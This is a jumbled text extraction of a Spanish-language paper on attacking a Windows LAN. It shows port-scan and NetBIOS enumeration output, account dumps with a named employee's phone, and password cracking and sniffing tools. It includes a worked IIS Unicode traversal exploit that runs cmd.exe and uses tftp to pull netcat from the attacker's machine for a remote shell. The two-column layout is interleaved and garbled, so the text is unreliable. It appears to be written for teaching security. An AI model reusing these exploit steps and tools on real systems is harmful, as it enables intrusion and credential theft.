Professional Documents
Culture Documents
these tools the intruder and discovers Microsoft that allow an attacker to
that computers are ON-LINE and infiltrate other networks
roles within the network because the
ports are open on the machine KeyWords
attacked what they say.
LAN, Attack, Victim, Windows, Linux,
The attack not only on the LAN scanning, port IP address.
directly threatens teams miebros
remember this as the outline of
Microsoft domains, working
relationships of trust raised by
1. INTRODUCCIÓN
Ataque
m. Acción de atacar (acometer y llevar o tomar la iniciativa).
Componente ofensivo de algo.
Acometimiento de algún accidente de que evita el normal funcionamiento
fig. Impugnación, disputa.
Roberto Carlos Guevara Calume
3. DISECCIÓN DE UN ATAQUE
4. Defensa : Como evitar y que medidas para evitar las intrusiones, y los
ataques
♣
En muchas empresas el login de una persona puede ser construido de forma facil y de echo es información “publica”, una
política es común es usar la primera letra del nombre, el apellido y un consecutivo, p.ejm Simón Bolívar tendría
SBOLIVAR1 en caso de no tener Homónimos.
Roberto Carlos Guevara Calume
El modelo usado estará basado en TCP/IP (4 capas sin importar lo físico) pero las
capas se tomaran como indica el modelo OSI (7 capas). Los protocolos de capas
1,2 en OSI no son relevantes, con excepción de la dirección MAC.
Lo anterior por ser el conjunto de protocolos TCP/IP el mas usado tanto en LAN
como en WAN, es de anotar que se no se usa un direccionamiento IP sino un IPX
y un transporte TCP o UDP sino SPX nada de lo siguiente funcionará.
En cuanto a los productos, por ejemplo, el ataque efectuado a IIS, no será igual al
realizado a Apache. Los programas usados para hacer estos ataques se
mencionarán y se dirigirá al sitio en Internet donde se podrán acceder, en lo
posible se usarán herramientas gratuitas.
4. INTRUSIONES EN WINDOWS.
El problema empieza cuando un intruso intenta atacar nuestra LAN, bien sea
desde Internet o desde el interior, o bien capture la información desde el interior y
ataque de fuera♣.
Descubriendo la LAN
Un atacante puede tener información de muchas formas, en nuestra LAN victima,
la información puedes ser recopilada por Internet, por personal de soporte al
interior, o por personas que tengan acceso a un punto de red.
♣
La mayoría de los ataque son realizados por personas que conocen el interior de la LAN, pero si no se tuviera esta
información, es posible obtenla.
Roberto Carlos Guevara Calume
Escaneo
Que sucede si el intruso no esta en Internet buscando una victima, si no que es
una persona que conoce la LAN, sabe cual es el direccionamiento IP usado, cual
es el dominio, como se construyen los LOGIN, que hacen y cuales son los
servidores.
Entonces este intruso esta más cerca de poder implementar un ataque, Hay que
recordar que en su gran mayoría los ataques son realizados por personal que de
una u otra forma tiene contacto directo con la LAN.
TCP ports: 7 9 13 19 21 25 80 110 135 139 389 443 445 1024 1025 1027 1720 2869
5000
UDP ports: 7 9 53 67 68 123 135 137 138 161 445 500 520 1900 3456
------------------------------------------------------------------------------
192.168.0.2
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 22 23 25 79 80 111 113 139 389 515 587 901 1720 10000
UDP ports: 68 69 111 123 135 137 138 161 191 192 256 260 407 445 500 514 520 Respondió la IP
1009 1024 1025 1027 1028 1030 1033 1034 1035 1037 1041 1058 1060 109 192.168.0.2
1 1352 1434 1645 1646 1812 1813 2002 2049 2140 2161 2301 2365 2493 2631 2967
3179 3327 3456 4156 4296 4469 4802 5631 5632 11487 31337 32768 32769
32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781
32782 32783 32784 32785 32786 32787 32788 32789 32790
-------------------------------------------------------------------------------
192.168.0.3
Responded in 10 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 25 53 80 88 119 135 139 389 443 445 563 593 636 1027 1029 1720
1723 3268 3372 Respondió la IP
UDP ports: 53 123 135 137 138 161 445 500 1028 1645 1646 1812 1813 3456 192.168.0.3
-------------------------------------------------------------------------------
192.168.0.10
Responded in 10 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 22 25 79 80 110 111 113 389 515 587 901 1720 10000
UDP ports: 68 69 111 123 135 137 138 161 191 192 256 260 407 445 500 514 520
1009 1034 1035 1037 1041 1058 1060 1091 1352 1434 1645 1646 1812 1813 1900 Respondió la IP
1978 2002 2631 2967 3179 3327 3456 4045 4156 4296 4469 4802 5631 5632 11487 192.168.0.200
31337 32768 3276 32779 32780 32781 32782 32783 32784 32785 32786 32787
32788 32789 32790 43981
-------------------------------------------------------------------------------
192.168.0.200
Responded in 10 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 139 389 1720
UDP ports: 137 138
-------------------------------------------------------------------------------
Dominio
--------------------------------------------- Existen 3 grupos de
GRUPOLINUX trabajo
INTRUSO
RCGCALUME
Se ha completado el comando correctamente.
Paso Dos Muestra la equipos
asociados a
Ejecutar el programa con parámetros asi: RCGCALUME
Si un intruso sabe que la LAN victima es una red Microsoft querrá saber mas
información de los equipos ONLINE. De la intrusión con Scanline sabemos que
están ON-LINE las IP 192.168.0.1 , 192.168.0.2, 192.168.0.3 y 192.168.0.200.
Con la información arrojada por el escaneo logramos detectar que la red es una
clase C privada, 192.168.0.0 e intuimos una mascara 255.255.255.0 ver intrusión
de escaneo .
♣
Este es un comando que viene con los sistemas operativos Microsoft
♣♣
Se pude bajar de www.inetcat.org/software/nbtscanf.html
Roberto Carlos Guevara Calume
192.168.0.0 Sendto failed: Cannot assign requested address Muestra la IP, el ,nombre Netbios del
equipo y un código
192.168.0.1....WINXP ....00U
192.168.0.1....WINXP ....20U 192.168.0.0
192.168.0.1....INTRUSO ....00G como es de suponer esa dirección es el Id
192.168.0.1....INTRUSO ....1eG de red y no la IP asignada a un equipo, y
192.168.0.1....INTRUSO ....1dU por eso da un error.
192.168.0.1....☺☻__MSBROWSE__☻ ....01G
192.168.0.1....MAC....00-50-56-c0-00-01 192.168.0.1
00U : nombre de maquina WINXP
192.168.0.2....LINUX01 ....00U 20U: Servidor
192.168.0.2....LINUX01 ....03U 00G: Nombre del dominio INTRUSO
192.168.0.2....LINUX01 ....20U 1EG y 1DU: grupo INTRUSO
192.168.0.2....☺☻__MSBROWSE__☻....01G 01G: equipo principal de su grupo
192.168.0.2....GRUPOLINUX ....00G
192.168.0.2....GRUPOLINUX ....1dU por ultimo la dirección MAC
192.168.0.2....GRUPOLINUX ....1eG
192.168.0.2....MAC....00-00-00-00-00-00 092.168.0.2
Se llama LINUX01,
192.168.0.3....WIN2000 ....00U Es Servidor, Pertenece a GrupoLINUX
192.168.0.3....WIN2000 ....20U
192.168.0.3....RCGCALUME ....00G 03U: usuario de mensajeria LINUX01,
192.168.0.3....RCGCALUME ....1cG generalmente es el Mismo LOGIN
192.168.0.3....RCGCALUME ....1bU La MAC es 00-00-00-00-00-00 Muy Raro!!
192.168.0.3....RCGCALUME ....1eG O Puede ser que NO es un equipo
192.168.0.3....WIN2000 ....03U Windows normal.
192.168.0.3....RCGCALUME ....1dU
192.168.0.3....☺☻__MSBROWSE__☻....01G 192.168.0.3
192.168.0.3....INet~Services ....1cG Se llama WIN2000
192.168.0.3....IS~WIN2000....00U Es Servidor, Pertenece a RCGCalume
192.168.0.3....ADMINISTRADOR ....03U 1CG: Es un Controlador de Dominio
192.168.0.3....MAC....00-50-56-dc-eb-b8 Llamado RCGCalume osea el grupo y el
Dominio se llaman Igual ¡!!
192.168.0.10 Recvfrom failed: Connection reset by peer 1CG: Ofrece servicios como DHCP,DNS
00U: aquí indica que es servidor IIS
192.168.0.10
192.168.0.200....WIN98 ....00U Este responde pero no entrega información
192.168.0.200....RCGCALUME ....00G puede ser un equipo con un sistema
192.168.0.200....WIN98 ....03U operativo diferente a Windows.
192.168.0.200....WIN98 ....20U
Roberto Carlos Guevara Calume
Esta es una herramienta grafica que puede dar información de permisos, del Se dirigio a la ip
filesystem, registry, printer, archivos compartidos, usuarios grupos etc, viene en 192.168.0.3
el
07/06/2003 05:22 a.m. - Somarsoft DumpSec (formerly DumpAcl) - \\192.168.0.3
UserName
Este e un reporte pero,
Administrador explore que posibilidades
FullName diferentes ofrece,
Comment Cuenta para la administración del equipo o dominio
PswdCanBeChanged Yes
HomeDir El reporte original es mucho
mas extenso
Invitado
FullName
Comment Cuenta para acceso como invitado al equipo o dominio
PswdCanBeChanged No
HomeDir
Roberto Carlos Guevara Calume
Jjaramillo1
FullName Juan Jaramillo
Comment Gerente de marcadeo, tel 299-0077 ext 341
PswdCanBeChanged Yes
HomeDir \\win2000\Mercadeo
IUSR_WIN2000
FullName Cuenta de invitado a Internet
A simple Vista un Intruso puede reconstruir con estas herramientas la LAN victima,
solo con un portátil y un punto de red, pero como evitar esto?
PASO DOS
//GENERAL //PROPIEDADES En la pestaña GENERAL Se Selecciona TCP/IP
y se selecciona el botón PROPIEDADES
PREGUNTANDO AL DNS
Podemos preguntar al DNS de la red muchas cosas las cuales nos serán muy
útiles, el comando usado es NSLOOKUP♣ , y lo primero es preguntar quien es el
DNS, aunque lo sospechamos pues solo hay un PDC que es WIN2000.
♣
Nslookup viene de forma estandart con windows
Roberto Carlos Guevara Calume
Sumario:
• Es una red, privada clase C, tiene varios, servicios DNS (53), FTP(21),
Correo(110), LDAP(389), WEB(80), NETBIOS(138 -138), WEBMIN(10000) .
• La red tiene varios grupos de trabajo GrupoLinux, RCGCalume, e INTRUSO el
grupo creado por el atacante, este computador solo tiene configurada una ip
valida, nada mas.
• Se conocen los computadores que pertenecen a cada grupo,
• Se Conoce el nombre Netbios de Cada maquina su IP y el usuario que hizo el
login en cada computador, la mac y la cuenta de mensajes , Intrusion
• Se sabe que existe un PDC que pertenece al grupo RCGCalume y se llama
WIN2000, y tiene IIS montado.
• Se tiene información de cada cuenta creada en el PCD e información basica
como nombres del usuario cargo, teléfono y correo, además se puede intuir la
forma con que se asignan los login y los directorios asignados a cada usuario
• Se sabe cual es el nombre del dominio, y los nombres tanto reales de las ip
como los alias, se sabe cual es el servidor de correo
• Cualquier otra información detallada se puede consultar al AD.
5. ATAQUES EN WINDOWS
Luego de la intrusión, ósea el solo tener información viene el ataque que empieza
con la obtención de una contraseña, bien sea adivinada, robada, encontrada por
casualidad o tomada a la fuerza.
La cuenta de invitado
Ejecutar el programa con parámetros así En este caso esta desactivada pero no
borrada.
C:\>net use \\192.168.0.3\IPC$ * /u:invitado
Escriba la contraseña para \\192.168.0.3\IPC$:
Error de sistema 1331.
Adivinar Contraseñas
Para Adivinar contraseñas debemos usar una herramienta tal, que si sabemos un
nombre de usuario, la herramienta sea capaz de encontrar el password,
autenticándose a un servidor, esto equivale a hacer manualmente muchas
autenticaciones hasta lograr el acceso, lo cual sería casi imposible.
Brutus
La Herramienta llamada Brutus, puede enviar muchos paquetes SMB
directamente al servidor a atacer, con el usuario, dominio y un password, este
password puede ser adquirido de varias formas, una es la fuerza bruta, osea el
password es generado, o el password es leido de un archivo llamado Diccionario.
SMBRelay
Esta es una alternativa, No grafica y muy rápida para poder “ interceptar los datos
de login en la red, esta herramienta genera un archivo donde se guarda la el
password encriptado, y luego sobre este archivo de puede ejecutar una cracker
para que la desencripte.
Roberto Carlos Guevara Calume
L0PHTCrack
Otra herramienta llamada L0phtCrack puede hacer lo anterior y además puede
capturar, el archivo SAM, vaciar los passwords desde el registry además de
capturar el trafico SMB en toda la red o el trafico SMB desde o hacia un equipo en
particular, y que mejor que el propio PDC.
- IP origen y destino
- USER NAME
- Contraseña encriptada
SMB SNIFFING
Al momento de hacer la autenticación los datos los datos de login y password de
usuario pasan por la red, este es momento en el que se produce el ataque.
usando una utilidad del L0phtcrack llamada SMB Packet Capture, en la versión
2.5♣
Con esto tenemos password y una contraseña validos en el dominio. Pero con una
cuenta limitada, estamos limitados, es preferible ser el administrador.
♣
Al momento de hacer este ataque encontré la versión mejorada, llamada LC4, y la utilidad cambio de nombre llamándose
IMPORT FROM Sniffer.
Roberto Carlos Guevara Calume
como obligarlo??
Paso Dos
Una forma es enviando un correo, recoredemos
Para: jjaramillo1@linux02.rcgcalume.org que tenemos el login y password de un usuario
Cc: administrador@linux02.rcgcalume.org “legal” mmarulanda y tenemos una lista de
usuarios posible victimas (Sin password
Asunto: Algo sugestivo crackeado) ,Jjaramillo1, invitado, Administrador
PipeUPADMIN.
Narración
ATAQUE USANDO PIPEUPADMIN Usando Terminal Server Se obligar a la victima a dar permisos
de administrador,
Paso 1
PWDump
Este programa es capas de tomar todas las cuentas con sus respectivas
contraseñas encriptadas que luego pueden ser des encriptadas con L0Phtcack
LC4
This program is free software based on pwpump2 by Tony Administrador: cuenta usada, esta debe tener
Sabin under the GNU General Public License Version 2 privilegios de administrador.
(GNU GPL), you can redistribute it and/or modify it under the
terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED,
IS GRANTED WITH THIS PROGRAM. Please see the
COPYING file included with this program (also available at
www.ebiz-tech.com/pwdump3) and the GNU GPL for further
details.
Roberto Carlos Guevara Calume
Los datos y el ataque realizado es real♣, Estas cuentas son reales, se escogieron
las cuentas mas representativas creadas por el administrador, las Cuentas del
sistema como Krtbtgt, TsInternetUser, IUSR_WIN2000 IWAM_WIN2000 etc... no
se tuvieron encuanta así como las des activadas.
Paso Uno
Como conocemos la contraseña del administrador
Ejecutar net use asi:
Intentamos hacer una conexión como
C:\>net use \\192.168.0.3\ipc$ 1234 /u: administrador administrador
♣
El tiempo tomado para crakerar fue alrededor de 7 minutos en estas condiciones, pero una sola contraseña como
Aad456j$23%tg&34/(67),?[{Fadr45212 puede ser virtualmente inviolable pues los tiempos de espera serian de muchos
años, posiblemente cientos o miles, es decir el uso de mayúsculas minúsculas , números, caracteres especiales y larga,
pero con más velocidad de proceso, mejores algoritmos, y uso de computación distribuida, puede reducir la cantidad de
tiempo.
Roberto Carlos Guevara Calume
El acante puede registrar las pulsaciones del teclado como, Invisible KeyLogger
Sealt (IKS) , o usar FrakeGINA,
intentamos no atacar el sevicio de Web sino tomar el servidor que aloja la pagina
web.
PASO uno
C:\>nc -vv 192.168.3 80
WIN2000 [192.168.0.3] 80 (http) open
Paso dos
GET /scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+c:\
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 23 Jul 2003 22:47:28 GMT
Content-Type: application/octet-stream
El volumen de la unidad C no tiene etiqueta.
El n·mero de serie del volumen es: 607C-47F0
Directorio de c:\
antes debe preparar un servidor TFTP que pueda enviar el archivo NC.EXE
(NetCat)
Roberto Carlos Guevara Calume
Paso uno
Paso dos
Fuerza a correr el cliente TFTP del servidor
GET /scripts/..%c0%af../winnt/system32/tftp.exe? Haciendo que se copie NC en el c:\
"-i"+192.168.0.1+GET+nc.exe+c:\nc.exe HTTP/1.0
Por comodidad se puede copiar tambien el
HTTP/1.1 502 Error de la puerta de enlace o gateway archivo cmd.exe
Server: Microsoft-IIS/5.0
Date: Wed, 23 Jul 2003 23:41:21 GMT
Content-Length: 321
Content-Type: text/html
Paso cuatro
Luego digamos a NC qie cree una consola
remota a nuestro pc,
Luego de corremos nc en la victima
recuerde atacante es 192.168.0.1
C:\instaladores\herramientas red\nc>nc -vv 192.168.3 80 la victima es 192.168.0.3
Algunas medidas de segurudad, nunca use FAT, use siempre NTFS, (aunque los
ataques anteriores se realizaron con NTFS, y no hay directorios compatidos
Roberto Carlos Guevara Calume
La gran falla esta en que el atacante puede predecir donde estan los directorios
como:
C:\winnt
C:\winnt\system32
C:\inetpub
C:\inetpub\scripts